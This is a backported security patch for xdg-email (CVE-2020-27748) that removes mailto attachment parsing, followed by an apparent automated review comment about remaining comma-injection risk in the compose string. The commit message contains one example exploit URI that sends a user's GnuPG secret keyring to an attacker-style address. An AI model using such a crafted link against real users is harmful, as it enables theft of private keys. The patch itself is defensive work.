Andrew Geissler | 5199d83 | 2021-09-24 16:47:35 -0500 | 1 | From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 |
| 2 | From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> |
| 3 | Date: Tue, 18 Aug 2020 16:52:24 +0100 |
| 4 | Subject: [PATCH] xdg-email: remove attachment handling from mailto |
| 5 | MIME-Version: 1.0 |
| 6 | Content-Type: text/plain; charset=UTF-8 |
| 7 | Content-Transfer-Encoding: 8bit |
| 8 | |
| 9 | This allows an attacker to extract secrets from users: |
| 10 | |
| 11 | mailto:sid@evil.com?attach=/.gnupg/secring.gpg |
| 12 | |
| 13 | See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 |
| 14 | and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 |
| 15 | |
| 16 | Signed-off-by: Jörg Thalheim <joerg@thalheim.io> |
| 17 | --- |
| 18 | scripts/xdg-email.in | 7 +------ |
| 19 | 1 file changed, 1 insertion(+), 6 deletions(-) |
| 20 | |
| 21 | Upstream-Status: Backport |
| 22 | CVE: CVE-2020-27748 |
| 23 | |
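diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
index 6db58ad..5d2f4f3 100644
--- a/scripts/xdg-email.in
+++ b/scripts/xdg-email.in
@@ -32,7 +32,7 @@ _USAGE
 
 run_thunderbird()
 {
- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
 THUNDERBIRD="$1"
 MAILTO=$(echo "$2" | sed 's/^mailto://')
 echo "$MAILTO" | grep -qs "^?"
@@ -48,7 +48,6 @@ run_thunderbird()
 BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
 SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
 BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
 
 if [ -z "$TO" ] ; then
 NEWMAILTO=
@@ -68,10 +67,6 @@ run_thunderbird()
 NEWMAILTO="${NEWMAILTO},$BODY"
 fi
 
- if [ -n "$ATTACH" ] ; then
- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
- fi
-
 NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
 DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
 "$THUNDERBIRD" -compose "$NEWMAILTO"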
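Review bot: Removing the `attach=` parsing does not by itself keep an attachment field out of the `-compose` argument, because the remaining URI values are still joined unescaped into that comma-separated string: `NEWMAILTO="${NEWMAILTO},$BODY"` in the last hunk appends the raw `body=` text, and SUBJECT is extracted the same way in the second hunk. A value that itself contains a comma may be read by the client as additional compose fields, possibly including the `attachment=` field this patch drops; how Thunderbird splits the string is not visible here and should be confirmed. I would encode the separators before joining, for example `BODY=$(echo "$BODY" | sed "s/,/%2C/g;s/'/%27/g")` and the same for SUBJECT (assuming the client percent-decodes these fields), and add a comment above the `-compose` call stating that every field originates from an untrusted URI. run_thunderbird starts and ends outside the hunks, so the quoting of the percent-decoded TO/CC/BCC values could not be checked.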
| 56 | -- |
| 57 | GitLab |
| 58 | |